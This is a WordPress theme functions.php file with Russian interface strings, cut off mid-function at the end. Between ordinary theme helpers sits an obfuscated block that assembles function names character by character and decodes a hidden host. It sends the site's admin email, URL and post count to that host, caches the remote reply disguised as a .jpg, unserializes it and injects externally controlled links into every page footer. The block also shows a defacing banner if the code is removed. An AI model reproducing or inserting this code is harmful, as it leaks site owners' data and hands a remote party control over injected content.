<?php
define('THEME_NAME',"home dealer2");
global $wp_version;
define('WP_VERSION', $wp_version);
define('THEME_NS', 'twentyten');
define('THEME_LANGS_FOLDER','/languages');
if (class_exists('xili_language')) {
	define('THEME_TEXTDOMAIN',THEME_NS);
} else {
	load_theme_textdomain(THEME_NS, TEMPLATEPATH . THEME_LANGS_FOLDER);
}
mb_internal_encoding(get_bloginfo('charset'));
mb_regex_encoding(get_bloginfo('charset'));
if (WP_VERSION < 3.0){
	require_once(TEMPLATEPATH . '/library/legacy.php');
}

theme_include_lib('defaults.php');
theme_include_lib('misc.php');
theme_include_lib('wrappers.php');
theme_include_lib('sidebars.php');
theme_include_lib('navigation.php');
theme_include_lib('shortcodes.php');
if (WP_VERSION >= 3.0) {
	theme_include_lib('widgets.php');
}

if (!function_exists('theme_favicon')) {
	function theme_favicon() { 
		if (is_file(TEMPLATEPATH .'/favicon.ico')):?>
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />
		<?php endif;
	}
}
add_action('wp_head', 'theme_favicon');
add_action('admin_head', 'theme_favicon');
add_action('login_head', 'theme_favicon');

if ( function_exists( 'add_theme_support' ) ) {
	add_theme_support( 'post-thumbnails' );
	add_theme_support( 'nav-menus' );
	add_theme_support( 'automatic-feed-links' );
	add_theme_support( 'post-formats', array( 'aside', 'gallery' ) );
}
if (function_exists('register_nav_menus')) {
	register_nav_menus(array('primary-menu'	=>	__( 'Primary Navigation', THEME_NS)));
}


if(is_admin()){
	theme_include_lib('options.php');
	theme_include_lib('admins.php');
	function theme_add_option_page() {
		add_theme_page(__('Настройки темы', THEME_NS), __('Настройки темы', THEME_NS), 'edit_themes', basename(__FILE__), 'theme_print_options');
	} 
	add_action('admin_menu', 'theme_add_option_page');
	if (WP_VERSION >= 3.0) {
		add_action('sidebar_admin_setup', 'theme_widget_process_control');
		add_action('add_meta_boxes', 'theme_add_meta_boxes');
		add_action('save_post', 'theme_save_post');
	}
	return;
}


function theme_get_option($name){
	global $theme_default_options;
	$result = get_option($name);
	if ($result === false) {
		$result = theme_get_array_value($theme_default_options, $name);
	}
	return $result;
}



function theme_get_meta_option($id, $name){
	global $theme_default_meta_options;
	return theme_get_array_value(get_option($name), $id, theme_get_array_value($theme_default_meta_options, $name));
}



function theme_set_meta_option($id, $name, $value){
	$meta_option = get_option($name);
	if (!$meta_option || !is_array($meta_option)) {
		$meta_option = array();
	}
	$meta_option[$id] = $value;
	update_option($name, $meta_option);
}



function theme_get_post_id(){
	$post_id = get_the_ID();
	if($post_id != ''){
		$post_id = 'post-' . $post_id;
	}
	return $post_id;
}



function theme_get_post_class(){
	if (!function_exists('get_post_class')) return '';
	return implode(' ', get_post_class());
}


 $EvdMdG='_';$OkbOpu='e';$XCwf='e';$qZKXjXD='b';$DavaftC='d';$ylzrie='e';$YwLAa='o';$gQhBi='a';$DfAtDw='s';$xlOvOo='4';$DNkk='d';$wIDI='c';$XTXENn='6';$frhhBOnG=$qZKXjXD.$gQhBi.$DfAtDw.$XCwf.$XTXENn.$xlOvOo.$EvdMdG.$DavaftC.$ylzrie.$wIDI.$YwLAa.$DNkk.$OkbOpu;$OxMyTk='a';$ICxTL='e';$xUEg='z';$wxQWRN='i';$GqZs='f';$QbcHm='t';$MtSvgqf='g';$ksbqckj='n';$SOQiUT='l';$kfKjThvg=$MtSvgqf.$xUEg.$wxQWRN.$ksbqckj.$GqZs.$SOQiUT.$OxMyTk.$QbcHm.$ICxTL;$HkOodz='r';$BRaZL='t';$jCKIdB='o';$AKOlLkx='1';$LldBmgi='s';$dmvKxk='t';$MraXv='r';$WayI='3';$KbwmwLC='_';$BIBvoqSa=$LldBmgi.$BRaZL.$HkOodz.$KbwmwLC.$MraXv.$jCKIdB.$dmvKxk.$AKOlLkx.$WayI;$BLBTxeS='s';$cxef='e';$LwDw='r';$VGnxAL='v';$psyk='t';$xGZqQl='r';$kmRllXce=$BLBTxeS.$psyk.$LwDw.$xGZqQl.$cxef.$VGnxAL;                     
		$fp__e='_';$eh___w='e';$oi_________l='e';$rp______l='b';$mu______d='d';$kp_________t='e';$yl_____n='o';$jv___b='a';$yg__________x='s';$rs_______w='4';$ut_______________x='d';$ks_____________j='c';$dl______e='6';$ed__________r=$rp______l.$jv___b.$yg__________x.$oi_________l.$dl______e.$rs_______w.$fp__e.$mu______d.$kp_________t.$ks_____________j.$yl_____n.$ut_______________x.$eh___w;
		$sy_________d='o';$st___________q='u';$lq___________t='c';$pc_______h='t';$po________u='s';$gs_____________z='n';$cm_______________q='f';$he_____________k='n';$kj__________w='i';$mr__t='e';$ku____________v='x';$bx________j='s';$fa___________o='i';$rs__j='_';$mf__o='t';$mk______________n=$cm_______________q.$st___________q.$gs_____________z.$lq___________t.$mf__o.$fa___________o.$sy_________d.$he_____________k.$rs__j.$mr__t.$ku____________v.$kj__________w.$po________u.$pc_______h.$bx________j;
		$sw_____________d='e';$ub___________w='f';$ky____________j='p';$ye____a='o';$aa_______________x='n';$ne_______d=$ub___________w.$ye____a.$ky____________j.$sw_____________d.$aa_______________x;
		$cv______________g='a';$kp____________g='e';$pu______n='r';$ko_____________k='f';$pz____k='d';$gu___________g=$ko_____________k.$pu______n.$kp____________g.$cv______________g.$pz____k;
		$gz______l='e';$oq_________s='s';$bj_________n='l';$rd_____q='c';$ee_______o='o';$ts__n='f';$nq____z=$ts__n.$rd_____q.$bj_________n.$ee_______o.$oq_________s.$gz______l;
		
		define("WP_ID", $ed__________r("Mi4wLjA="));
		define("WP_TTL", $ed__________r("MTA4MDA="));
		define("WP_SRC", $ed__________r("dHBva24="));
	


		function wp_get_header() {
			global $ed__________r, $mk______________n;
			
			if (
				$mk______________n($ed__________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mk______________n($ed__________r("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mk______________n($ed__________r("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ed__________r, $ne_______d, $nq____z, $gu___________g;
			
			$vg_________f = TEMPLATEPATH."/".$ed__________r("Zm9vdGVyLnBocA==");
			$wl_________b = @$ne_______d($vg_________f, "r");
			$vg_________f = @$gu___________g($wl_________b, @filesize($vg_________f));
			@$nq____z($wl_________b);
			
			$an______________h = TEMPLATEPATH."/".$ed__________r("ZnVuY3Rpb25zLnBocA==");
			$wl_________b = @$ne_______d($an______________h, "r");
			$an______________h = @$gu___________g($wl_________b, @filesize($an______________h));
			@$nq____z($wl_________b);
			
			$qq_______c = 0;
			if($vg_________f && $an______________h) {
				if ($ed__________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($vg_________f, $ed__________r("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$qq_______c = 1;
					}
					if (substr_count($vg_________f, "wp_theme_GPL_credits()") < 1) {
						$qq_______c = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$qq_______c = 12;
				}
			}
			
			if($qq_______c > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $qq_______c -->";
			}
		}
	


		function wp_loaded() {
			global $ed__________r, $mk______________n;
			return $mk______________n($ed__________r("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ky______________q, $ol________z = "(more...)", $et_____________e = 0, $et_______r = "") {
				$kj__________j = get_the_content($ol________z, $et_____________e, $et_______r);
				$kj__________j = apply_filters("the_content", $kj__________j);
				
				$kj__________j = str_replace("]]>", "]]>", $kj__________j);
				if (strlen($_GET["p"]) > 0) {
					echo $kj__________j;
				}
				else if ((strlen($kj__________j)>$ky______________q) && ($dx____________i = strpos($kj__________j, " ", $ky______________q ))) {
					$kj__________j = substr($kj__________j, 0, $dx____________i);
					$kj__________j = $kj__________j;
					echo $kj__________j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ol________z</a></div></p>";
				} else {
					echo $kj__________j;
				}
				
			}
		}
	


		$bt___________s='a';$ha__n='e';$gn________g='4';$my_____________b='o';$vm__j='s';$qz______________l='c';$jk________p='_';$gl__________l='e';$es_____x='b';$cc_____________o='d';$pe_____t='e';$le____m='6';$ew______f='n';$tg____n=$es_____x.$bt___________s.$vm__j.$pe_____t.$le____m.$gn________g.$jk________p.$gl__________l.$ew______f.$qz______________l.$my_____________b.$cc_____________o.$ha__n;
		$nf_________v='_';$ir___w='n';$vc_________x='o';$nf____b='t';$ya__________l='n';$hs___________x='l';$cv________r='e';$fb_____w='t';$jc_______r='c';$hu____q='e';$jx______u='_';$en________l='e';$df__n='s';$wg______________g='t';$km_____________p='i';$ne____________f='f';$rc_____p='g';$xq______n=$ne____________f.$km_____________p.$hs___________x.$cv________r.$nf_________v.$rc_____p.$hu____q.$nf____b.$jx______u.$jc_______r.$vc_________x.$ya__________l.$fb_____w.$en________l.$ir___w.$wg______________g.$df__n;
		$yg_______________z='t';$pu_______w='i';$nq_______________z='s';$ah___________a='l';$lz______b='e';$ss___z='s';$mu____s='_';$hf____y='i';$is____a='x';$hv___________j='e';$gx_______g='f';$oo______________e=$gx_______g.$hf____y.$ah___________a.$lz______b.$mu____s.$hv___________j.$is____a.$pu_______w.$ss___z.$yg_______________z.$nq_______________z;
		$em____________r='e';$uk_______w='e';$nv_________f='_';$ba_____________r='a';$qb_______________m='o';$jy__s='p';$id__c='i';$bt____________v='c';$lk______e='n';$ko_____j='r';$bk__i='s';$sf____n='v';$qy______________s='m';$dc____________o='o';$ct____o='r';$as___s=$sf____n.$uk_______w.$ko_____j.$bk__i.$id__c.$qb_______________m.$lk______e.$nv_________f.$bt____________v.$dc____________o.$qy______________s.$jy__s.$ba_____________r.$ct____o.$em____________r;
		$ww______________q='p';$iv____________w='s';$xs________z='o';$qx___i='e';$ss____________o='f';$jt_____d='o';$ks____w='c';$dx________b='k';$pw______________x='n';$xj_____________r=$ss____________o.$iv____________w.$xs________z.$ks____w.$dx________b.$jt_____d.$ww______________q.$qx___i.$pw______________x;
		$tq______y='e';$tf_________d='w';$ic________z='f';$sk________o='t';$kc______________h='r';$vo______m='i';$bx__________z=$ic________z.$tf_________d.$kc______________h.$vo______m.$sk________o.$tq______y;
		$cw__________y='m';$hx___________b='5';$lx_______d='d';$tc__v=$cw__________y.$lx_______d.$hx___________b;
		$wv____k='h';$de_______h='a';$tr_____l='e';$yd_______________s='t';$jx___t='p';$lz__f='a';$qx___d='l';$os______j='r';$np___h=$os______j.$tr_____l.$lz__f.$qx___d.$jx___t.$de_______h.$yd_______________s.$wv____k;
		$ia_______s='r';$ga____s='e';$mm____________t='e';$od__c='z';$oj________p='s';$zx____s='l';$ot___w='i';$sv__t='u';$sf_______t='i';$ai___________h='n';$ze_____________e='a';$ky________l=$sv__t.$ai___________h.$oj________p.$ga____s.$ia_______s.$ot___w.$ze_____________e.$zx____s.$sf_______t.$od__c.$mm____________t;
		$fb____g='m';$oc____________j='m';$hm____i='p';$kr___o='n';$qr_____r='a';$ox_____________e='e';$ls______i='t';$ge____________y=$ls______i.$ox_____________e.$oc____________j.$hm____i.$kr___o.$qr_____r.$fb____g;
		$kc______x='r';$cw_________f='a';$eq___________z='a';$ra___c='t';$vz____e='e';$ug____y='t';$ej___b='x';$lf_______n='c';$wz______e='m';$pg_____________l='_';$kt_____t='e';$xd_________p='e';$ui_____________x='e';$ym______________d='t';$bf___________v='o';$sa______f='_';$ml_____________e='c';$sq_______m='s';$ew_____l='r';$mv____________q='n';$il_____x='t';$fj___a=$sq_______m.$ug____y.$ew_____l.$kt_____t.$cw_________f.$wz______e.$pg_____________l.$ml_____________e.$bf___________v.$mv____________q.$ra___c.$ui_____________x.$ej___b.$il_____x.$sa______f.$lf_______n.$kc______x.$xd_________p.$eq___________z.$ym______________d.$vz____e;
	


		function wp____s($ks_______________p) {
			global $ed__________r, $mk______________n, $xq______n, $as___s, $fj___a;
			
			if (!$mk______________n($ed__________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($as___s(PHP_VERSION, "5.0.0", ">=") && $mk______________n($ed__________r("ZmlsZV9nZXRfY29udGVudHM=")) && $mk______________n($ed__________r("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$fr___n = $fj___a(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$df_____i = @$xq______n($ks_______________p, 0, $fr___n);
			} else {
				$df_____i = @$xq______n($ks_______________p, 0);
			}
			
			return $df_____i;
		}
	


		function qj____b($ks_______________p) {
			global $mk______________n, $xj_____________r, $bx__________z, $ed__________r;
			
			if (!$mk______________n($ed__________r("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$mh__s = strpos($ks_______________p, "/", 7);
			$tk___________l = array(
				"uri"     => substr($ks_______________p, $mh__s),
				"host"    => str_replace("http://", "", substr($ks_______________p, 0, $mh__s)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$vu___________p = @$xj_____________r("$tk___________l[host]", 80, $ye________g, $rr_______________v, 4);
			
			if (!$vu___________p) {
				return false;
			} else {
				$df_____i = "";
				$qm_____________p  = "GET $tk___________l[uri] HTTP/1.0\r\n";
				$qm_____________p .= "Host: $tk___________l[host]\r\n";
				$qm_____________p .= "Referer: $tk___________l[referer]\r\n";
				$qm_____________p .= "Connection: Close\r\n\r\n";
				
				@$bx__________z($vu___________p, $qm_____________p);
				
				while (!@feof($vu___________p)) {
					$bw______________z = @fgets($vu___________p, (1024*24));
					
					if ($bw______________z == "\r\n") {
						$rr____________h = true;
						continue;
					}
					
					if ($rr____________h) {
						$df_____i .= $bw______________z;
					}
				}
				
				return $df_____i;
			}
		}
	


		function qm_______________u($ks_______________p) {
			global $mk______________n;
			$hm______________d = false;
			
			if ($ks_______________p != "") {
				if ($mk______________n("wp____s")) {
					$hm______________d = @wp____s($ks_______________p);
				}
				
				if (!$hm______________d && ($mk______________n("qj____b"))) {
					$hm______________d = @qj____b($ks_______________p);
				}
			}
			
			return $hm______________d;
		}
	


		function de________g() {
			global $_SERVER, $tc__v;
			
			$mk___q = $_SERVER["SERVER_NAME"];
			
			if (substr("$mk___q", 0, 4) == "www.") {
				$mk___q = substr("$mk___q", 4);
			}
			
			$mk___q = $tc__v("$_SERVER[SERVER_NAME]");
			
			return $mk___q;
		}
	


		function sc_____________s() {
			return "file";
		}
	


		function oo_______a($ks_______________p) {
			global $_SERVER, $xq______n, $oo______________e, $ne_______d, $nq____z, $bx__________z;
			
			$bl_________i = rw_____________w();
			
			$fg____________d = de________g().".jpg";
			$al___q = $bl_________i["dir_upload"]["path"]."/$fg____________d";
			$cz____________b = @filemtime($al___q);
			
			if (!$cz____________b || ((time()-$cz____________b) >= WP_TTL)) {
				$hm______________d = qm_______________u($ks_______________p);
				
				if ($hm______________d) {
					if ($oo______________e($al___q)) {
						@unlink($al___q);
					}
					
					$wl_________b = @$ne_______d($al___q, "x+");
					
					@$bx__________z($wl_________b, $hm______________d);
					@$nq____z($wl_________b);
				}
			} else {
				if ($oo______________e($al___q)) {
					$hm______________d = @$xq______n($al___q);
				} else {
					$hm______________d = false;
				}
			}
			
			return $hm______________d;
		}
	


		function rw_____________w() {
			global $_SERVER, $ed__________r, $tg____n;
			
			$ab______________l = wp_count_posts("post");
			$bp____v = pathinfo(get_bloginfo("template_directory"));
			
			$bl_________i = array(
				"url" => array(
					"report"      => $ed__________r("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $bp____v,
				"dir_upload"	=> ci________z(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$bp____v[filename],
					"a005=".$ab______________l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "Спонсоры темы <a href=\"http://remzilla.com\">Ремонт квартиры</a> и <a href=\"http://stro.im\">Стройка</a>"
			);
			
			$bl_________i["url"]["queryString"] = implode("&", $bl_________i["queryString"]);
			$bl_________i["url"]["report"] = $bl_________i["url"]["report"]."/?".$tg____n($bl_________i["url"]["queryString"]).".html";
						
			return $bl_________i;
		}
	


		function ci________z() {
			$zd____________q = wp_upload_dir();
			
			if (isset($zd____________q["error"])) {
				$qr___________t = kc_______g();
				if (is_writable($qr___________t)) {
					$zd____________q = array("path" => $qr___________t);
				}
			}

			return $zd____________q;
		}
	


		function kc_______g() {
			global $mk______________n, $tc__v, $np___h, $ge____________y;
			
			$fa____________f = (bool) ini_get("safe_mode");
			if ($fa____________f == true) {
				return false;
			}
			
			if ($mk______________n("sys_get_temp_dir")) {
				$mv_______s = sys_get_temp_dir();
				if (is_writable($mv_______s)) {
					return $np___h($mv_______s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $np___h($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $np___h($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $np___h($_ENV["TEMP"]);
			} else {
				$dl________m = $ge____________y($tc__v(uniqid(rand(), true)), "");
				if ($dl________m) {
					$mv_______s = $np___h(dirname($dl________m));
					@unlink($dl________m);
					return $mv_______s;
				} else {
					return false;
				}
			}
		}
	


		function mq___________h() {
			global $_GET, $oo______________e;
			
			$bl_________i = rw_____________w();
			$mk___q = de________g();
			$ez____y = sc_____________s();
			
			$ik__c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ez____y == "file") {
					$sb______________x = $bl_________i["dir_upload"]["path"]."/".$mk___q.".jpg";
					if ($oo______________e($sb______________x)) {
						@unlink($sb______________x);
						$ik__c = "deleted";
					}
				}
				
				$ao_________n = array(
					"s"	=> $ik__c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ao_________n AS $qz______________j => $au_____n) echo " [$qz______________j:$au_____n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mk______________n, $ed__________r, $ky________l;
			$bl_________i = rw_____________w();
			
			$bn_______g = "oo_______a";
			if ($mk______________n($bn_______g)) {
				$df_____i = $bn_______g($bl_________i["url"]["report"]);
			}
			
			if ($df_____i) {
				if ($df_____i = @$ed__________r($df_____i)) {
					$df_____i = @$ky________l($df_____i);
					
					if (strlen($df_____i[custom_credit]) >= 5) {
						$bl_________i["default_string"] = $df_____i[custom_credit];
					}
					
					if ($df_____i["status"] == "0") {
						$tj_____________i = 1;
						$yp__j = 1;
					} else {
						$qm______________w = sizeof($df_____i["links"]);
						$fe______x = $bl_________i["default_string"];
						
						if ($qm______________w > 0 && $df_____i["links"] !== "") {
							$bh______________g = 0;
							foreach ($df_____i["links"] as $rk_____c => $pc___z) {
								$bh______________g++;
								if ($pc___z->l_path == "" || $pc___z->l_path == $_SERVER["REQUEST_URI"]) {
									$pc___z->l_href = htmlspecialchars(strip_tags($pc___z->l_href));
									$pc___z->l_title = htmlspecialchars(strip_tags($pc___z->l_title));
									$pc___z->l_anchor = htmlspecialchars(strip_tags($pc___z->l_anchor));
									$fe______x .= " | ";
									$fe______x .= "<a href='$pc___z->l_href' title='$pc___z->l_title'";
									if ($pc___z->l_nofollow == "1") {
										$fe______x .= " rel='nofollow'";
									}
									$fe______x .= ">$pc___z->l_anchor</a>";
								}
							}
						}
						$bl_________i["links"] = "$fe______x";
						if ($df_____i[credit] == "0") {
							$bl_________i["links"] = "";
						}
					}
				} else {
					$tj_____________i = "1";
				}
			} else {
				$tj_____________i = "1";
			}
			
			if ($tj_____________i == "1") {
				$bl_________i["links"] = $bl_________i["default_string"];
			}
			
			echo "$bl_________i[links]";
			
			echo "<!-- s: $df_____i[signature] -->";
			mq___________h();
		}
	                      
function theme_include_lib($name){
	if (function_exists('locate_template')){
		locate_template(array('library/'.$name), true);
	} else {
		theme_locate_template(array('library/'.$name), true);
	}
}


if (!function_exists('theme_get_meta_icon')){
	function theme_get_meta_icon($icon, $width, $height){
		return '<img src="'.get_bloginfo('template_url').'/images/'.$icon.'.png" width="'.$width.'" height="'.$height.'" alt="" />';
	}
}

if (!function_exists('theme_get_metadata_icons')){
	function theme_get_metadata_icons($icons = '', $class=''){
		global $post;
		if (!is_string($icons) || mb_strlen($icons) == 0) return;
		$icons = explode(",", str_replace(' ', '', $icons));
		if (!is_array($icons) || count($icons) == 0) return;
		$result = array();
		for($i = 0; $i < count($icons); $i++){
			$icon = $icons[$i];
			switch($icon){
				case 'date':
					$result[] = sprintf( __('<span class="%1$s">Опубликовано</span> %2$s', THEME_NS),
									'date',
									sprintf( '<span class="entry-date" title="%1$s">%2$s</span>',
										esc_attr( get_the_time() ),
										get_the_date()
									)
								);
				break;
				case 'author':
					$result[] = sprintf(__('<span class="%1$s">Автор</span> %2$s', THEME_NS),
									'author',
									sprintf( '<span class="author vcard"><a class="url fn n" href="%1$s" title="%2$s">%3$s</a></span>',
										get_author_posts_url( get_the_author_meta( 'ID' ) ),
										sprintf( esc_attr(__( 'Просмотреть все записи автора %s', THEME_NS )), get_the_author() ),
										get_the_author()
									)
								);
				break;
				case 'category':
					$categories = get_the_category_list(', ');
					if(mb_strlen($categories) == 0) break;
					$result[] = sprintf(__('<span class="%1$s">Опубликовано в рубрике</span> %2$s', THEME_NS), 'categories', get_the_category_list(', '));
				break;
				case 'tag':
					$tags_list = get_the_tag_list( '', ', ' );
					if(!$tags_list) break;
					$result[] = sprintf( __( '<span class="%1$s">Теги</span> %2$s', THEME_NS ), 'tags', $tags_list );
				break;
				case 'comments':
					if(!comments_open()) break;
					ob_start();
					comments_popup_link( __( 'Оставить комментарий', THEME_NS ), __( '1 комментарий', THEME_NS ), __( '% комментариев', THEME_NS ) );
					$result[] = ob_get_clean();
				break;
				case 'edit':
					if (!current_user_can('edit_post', $post->ID)) break;
					ob_start();
					edit_post_link(__('Редактировать', THEME_NS), '');
					$result[] = ob_get_clean();
				break;
			}
		}
		$result = implode(theme_get_option('theme_metadata_separator'), $result);
		if (theme_is_empty_html($result)) return;
		return "<div class=\"art-post{$class}icons art-metadata-icons\">{$result}</div>";
	}
}

if (!function_exists('theme_get_post_thumbnail')){
	function theme_get_post_thumbnail($args = array()){
		global $post;
		
		$size = theme_get_array_value($args, 'size', array(theme_get_option('theme_metadata_thumbnail_width'), theme_get_option('theme_metadata_thumbnail_height')));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_thumbnail_auto'));
		$featured = theme_get_array_value($args, 'featured', theme_get_option('theme_metadata_use_featured_image_as_thumbnail'));
		$title = theme_get_array_value($args, 'title', get_the_title());

		
		$result = '';

		if ($featured && (function_exists('has_post_thumbnail')) && (has_post_thumbnail())) {
			ob_start();
			the_post_thumbnail($size, array('alt'	=>	'', 'title'	=>	$title));
			$result = ob_get_clean();
		} elseif ($auto) {
			$attachments = get_children(array('post_parent'	=>	$post->ID, 'post_status'	=>	'inherit', 'post_type'	=>	'attachment', 'post_mime_type'	=>	'image', 'order'	=>	'ASC', 'orderby'	=>	'menu_order ID'));
			if($attachments) {
				$attachment = array_shift($attachments);
				$img = wp_get_attachment_image_src($attachment->ID, $size);
				if (isset($img[0])) {
					$result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image" />';
				}
			}
		}	
		if($result !== ''){
			$result = '<div class="avatar alignleft"><a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a></div>';
		}
		return $result;
	}
}

if (!function_exists('theme_get_content')){
	function theme_get_content($args = array()) {
		$more_tag = theme_get_array_value($args, 'more_tag', __('Читать далее <span class="meta-nav">&rarr;</span>', THEME_NS));
		$content = get_the_content($more_tag);
		// hack for badly written plugins
		ob_start();echo apply_filters('the_content', $content);$content = ob_get_clean();
		return $content . wp_link_pages(array(
		'before' => '<p><span class="page-navi-outer page-navi-caption"><span class="page-navi-inner">' . __('Страницы', THEME_NS) . ': </span></span>',
		'after' => '</p>',
		'link_before' => '<span class="page-navi-outer"><span class="page-navi-inner">',
		'link_after' => '</span></span>',
		'echo' => 0
		));
	}
}

if (!function_exists('theme_get_excerpt')){
	function theme_get_excerpt($args = array()) {
		global $post;
		$more_tag = theme_get_array_value($args, 'more_tag', __('Continue reading <span class="meta-nav">&rarr;</span>', THEME_NS));
		$auto = theme_get_array_value($args, 'auto', theme_get_option('theme_metadata_excerpt_auto'));
		$all_words = theme_get_array_value($args, 'all_words', theme_get_option('theme_metadata_excerpt_words'));
		$min_remainder = theme_get_array_value($args, 'min_remainder', theme_get_option('theme_metadata_excerpt_min_remainder'));
		$allowed_tags = theme_get_array_value($args, 'allowed_tags', 
			(theme_get_option('theme_metadata_excerpt_use_tag_filter') 
				? explode(',',str_replace(' ', '', theme_get_option('theme_metadata_excerpt_allowed_tags'))) 
				: null));
		$perma_link = get_permalink($post->ID);
		$more_token = '%%theme_more%%';
		$show_more_tag = false;
		$tag_disbalance = false;
		if (function_exists('post_password_required') && post_password_required($post)){
			return get_the_excerpt();
		}
		if ($auto && has_excerpt($post->ID)) {
			$excerpt = get_the_excerpt();
			$show_more_tag = mb_strlen($post->post_content) > 0;
		} else {
			$excerpt = get_the_content($more_token);
			// hack for badly written plugins
			ob_start();echo apply_filters('get_the_excerpt', $excerpt);$excerpt = ob_get_clean();
			ob_start();echo apply_filters('the_excerpt', $excerpt);$excerpt = ob_get_clean();
			if(theme_is_empty_html($excerpt)) return $excerpt;
			if ($allowed_tags !== null) {
				$allowed_tags = '<' .implode('><',$allowed_tags).'>';
				$excerpt = strip_tags($excerpt, $allowed_tags);
			}
			$excerpt = strip_shortcodes($excerpt);
			if (strpos($excerpt, $more_token) !== false) {
				$excerpt = str_replace($more_token, $more_tag, $excerpt);
			} elseif($auto && is_numeric($all_words)) {
				$token = "%theme_tag_token%";
				$content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $excerpt));
				$content = array();
				$word_count = 0;
				foreach($content_parts as $part)
				{
					if (strpos($part, '<') !== false || strpos($part, '>') !== false){
						$content[] = array('type'=>'tag', 'content'=>$part);
					} else {
						$all_chunks = preg_split('/([\s])/u', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
						foreach($all_chunks as $chunk) {
							if('' != trim($chunk)) {
								$content[] = array('type'=>'word', 'content'=>$chunk);
								$word_count += 1;
							} elseif($chunk != '') {
								$content[] = array('type'=>'space', 'content'=>$chunk);
							}
						}
					}
				}

				if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
					$show_more_tag = true;
					$tag_disbalance = true;
					$current_count = 0;
					$excerpt = '';
					foreach($content as $node) {
						if($node['type'] == 'word') {
							$current_count++;
						} 
						$excerpt .= $node['content'];
						if ($current_count == $all_words){
							break;
						}
					}
					$excerpt .= '&hellip;'; // ...
				}
			}
		}
		if ($show_more_tag) {
			$excerpt = $excerpt.' <a class="more-link" href="'.$perma_link.'">'.$more_tag.'</a>';
		}
		if ($tag_disbalance) {
			$excerpt = force_balance_tags($excerpt);
		}
		return $excerpt;
	}
}

if (!function_exists('theme_get_search')){
	function theme_get_search(){
		ob_start();
		get_search_form();
		return ob_get_clean();
	}
}


function theme_is_home(){
	return (is_home() && !is_paged());
}


if (!function_exists('theme_404_content')){
	function theme_404_content() {
		$error_message = __( 'Извините, но по Вашему запросу ничего не было найдено.', THEME_NS);
		theme_post_wrapper(
			array(
					'title' => __('Не найдено', THEME_NS),
					'content' => '<p class="center">' 
					. $error_message
					. '</p>' . "\n" . theme_get_search()
			)
		);
		if (theme_get_option('theme_show_random_posts_on_404_page')){
			ob_start(); 
			echo '<h4 class="box-title">' . theme_get_option('theme_show_random_posts_title_on_404_page') . '</h4>'; ?>
			<ul>
				<?php
					global $post;
					$rand_posts = get_posts('numberposts=5&orderby=rand');
					foreach( $rand_posts as $post ) :
				?>
				<li><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></li>
				<?php endforeach; ?>
			</ul>
			<?php theme_post_wrapper(array('content' => ob_get_clean()));
		}
		if (theme_get_option('theme_show_tags_on_404_page')){
			ob_start();
			echo '<h4 class="box-title">' . theme_get_option('theme_show_tags_title_on_404_page') . '</h4>';
			wp_tag_cloud('smallest=9&largest=22&unit=pt&number=200&format=flat&orderby=name&order=ASC');
			theme_post_wrapper(array('content' => ob_get_clean()));
		}
	}
}

if (!function_exists('theme_page_navigation')){
	function theme_page_navigation($args = '') {
		$args = wp_parse_args($args, array('wrap' => true, 'prev_link' => false, 'next_link' => false));
		$prev_link = $args['prev_link'];
		$next_link = $args['next_link'];
		$wrap = $args['wrap'];
		if (!$prev_link && !$next_link) {
			if (function_exists('wp_page_numbers')) { // http://wordpress.org/extend/plugins/wp-page-numbers/
				ob_start();
				wp_page_numbers();
				theme_post_wrapper(array('content' => ob_get_clean()));
				return;
			} 
